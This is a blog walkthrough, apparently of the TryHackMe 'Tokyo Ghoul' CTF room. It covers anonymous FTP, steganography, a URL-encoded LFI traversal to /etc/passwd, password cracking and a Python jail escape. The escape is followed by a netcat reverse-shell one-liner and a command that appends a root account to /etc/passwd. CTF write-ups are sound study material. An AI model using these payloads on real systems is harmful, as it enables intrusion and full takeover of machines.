Open in app

Sign up

Sign in

Write

Sign up

Sign in

THM ROOM: Tokyo Ghoul Walkthrough

0xViKi
System Weakness
Published in
5 min readOct 25, 2023

--

Welcome to another exciting Try Hack Me adventure! In this write-up, we’ll be exploring the Tokyo Ghoul-themed machine to uncover its secrets and vulnerabilities. Buckle up, and let’s dive into the world of Tokyo Ghoul!

THM Challenge Link: https://tryhackme.com/room/tokyoghoul666

Reconnaissance:

Our adventure begins with an initial Nmap scan to discover open ports and services running on the target machine:

sudo nmap -sV -sS -A <IP>
Nmap Scan
  • Port 21 (FTP) running VSFTPD 3.0.322.
  • Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
  • Port 80 (HTTP) hosting an Apache web server on Ubuntu.

Information Gathering:

FTP Anon Login:

First, we explore the FTP service, and to our delight, it allows anonymous login. We find a directory named “need_Help?” and discover some interesting files and directories:

  • “Aogiri_tree.txt”
  • “Talk_with_me” (directory)
    - “rize_and_kaneki.jpg” an image file.
    - “need_to_talk” an ELF file, Linux Executable
FTP Files

Our curiosity piqued, we decide to investigate the images and the ELF file for any hidden secrets.

Linux Binary Analysis:

I executed the need_to_talk elf file, which requires a password. After entering the random password, the message stating “Take a look inside of me rabin2 -z” displays.

After analyzing the binary, we may extract the ascii strings using strings or rabin2. Below image is the result.

String Extraction via Rabin2

We obtained the password by string extraction, and when i executed the program and entered the password we obtained, it displayed another string that could be a password for something.

String Extraction via Strings

Steganographic Analysis:

When I run stegseek on the image(rize_and_kaneki.jpg) we obtained from FTP, it asked for a passphrase. We now know that the password from the ELF file may be the password. Voila!! We extracted a text file named “yougotme.txt”

“yougotme.txt” contains the morse encoded data as well as two phrases.

  • “haha you are so smart kaneki but can you talk my code”
  • “if you can talk it all right, you got my secret directory,”

and it contains morse encoded data, which I will decode with CyberChef. When decoded, it gives hex encoded data, and when hex data is decoded, I get base64 encoded data, and when we decode it, we get a clear text indicating it is a web directory.

CyberChef Decoding

We navigate to the web server and open the decoded directory. A message simply says, “scan me.” This can be interpreted as a hint to use directory enumeration techniques to find hidden websites.

Web Directory Enumeration:

We launch a Gobuster scan to reveal potential subdirectories:

gobuster dir -u http://<IP>/<DECODED_DIRECTORY> -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20

we discover the “/d1r3c70ry_center/claim” directory. However, it appears to be a Local File Inclusion (LFI) exploit that we must bypass.

LFI Bypass:

As i have trouble finding a solution to bypass the LFI vulnerability, i turn to resources such as HackTricks and numerous articles. We eventually come upon a GitHub repository that includes a potential bypass method: PayloadsAllTheThings.

Our exploration into Bypassing LFI vulnerabilities continues, and we eventually attack the issue using the URL-encoded path:

# URL Encoded, %2F == '/'; %2E == '.'
%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

# URL DECODED
/../../../etc/passwd

Now, with this LFI bypass, we gain access to system files, opening the door to further exploration.

User Enumeration:

With this newfound access, we decide to enumerate users on the system. After some exploration, we find the user “kamishiro.” We now have a foothold and will move forward to crack the password.

Cracking the password:

We crack the password for user “kamishiro” using John the Ripper. The very complicated and safe password is exposed after some time: “xxx”

John The Ripper cracking the password

We now have SSH access using the following credentials:

  • Username: kamishiro
  • Password: xxx

Initial Foothold:

I log in with SSH access and find myself in a limited environment. Because there isn’t much to investigate, our only option is to use the jail.py script.

Privilege Escalation:

I recall an article about Python jail escapes and sandbox exploitation and decide to explore the possibilities, trying different commands and statements. (Article about python jailbreak)

Exploiting python jail:

After reading it, I tried some trial and error till I found the exploit. It turns out that anything is contained within a “print” statement is executed. To accomplish my goal, I needed to combine a print statement with the Python sandbox escape.

# List available builtin functions
print(dir(__builtins__)) 

# Experimenting with importing built-in functions
print(__builtins__.__dict__['id'])  

# Command chaining
print(__builtins__.__dict__['type']('as'))  
print(__builtins__.__dict__['type'](123))
Python jailbreak PoC

Now, we have a means to execute Linux commands from Python, bypassing the jail restrictions.

Privilege Escalation Methods

We proceed to escalate our privileges and explore two potential methods:

Method 1: Reverse Shell

  1. Open a listener on your local machine: nc -nlvp 5555
  2. Execute the following command on the target machine:
print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <YOUR_TUN0_IP> 5555 >/tmp/f'))

Method 2: Editing /etc/passwd

  1. Generate a hashed password: openssl passwd toor (This creates a password hash, e.g., '$1$qw.JMQuz$RjNX2RLcJRGnz1/1jjhp10')
  2. Encode the entry for /etc/passwd:
echo "toor:\$1\$qw.JMQuz$RjNX2RLcJRGnz1/1jjhp10:0:0:root:/root:/bin/bash" | base64

# Output 
# dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=

3. Execute the following command on the target machine:

print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('echo "dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d >> /etc/passwd'))

For greater clarity, below is a brief video for each of the procedures stated above.

Retrieving Flags:

With root access secured, we were able to retrieve both the user and root flags.

  • The user flag was located in the “/home/kamishiro/user.txt” file.
  • The root flag was stored in the “/root/root.txt” file.

Voila!!! Congratulations on clearing the Tokyo Ghoul room. Thanks to the creators (devalfo and rockyou.txt) for providing this fantastic room.

Thm Writeup
Tokyo Ghoul
Ctf
Cybersecurity
Hacking

--

--

0xViKi
System Weakness
Follow

Written by 0xViKi

13 Followers
Follow

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams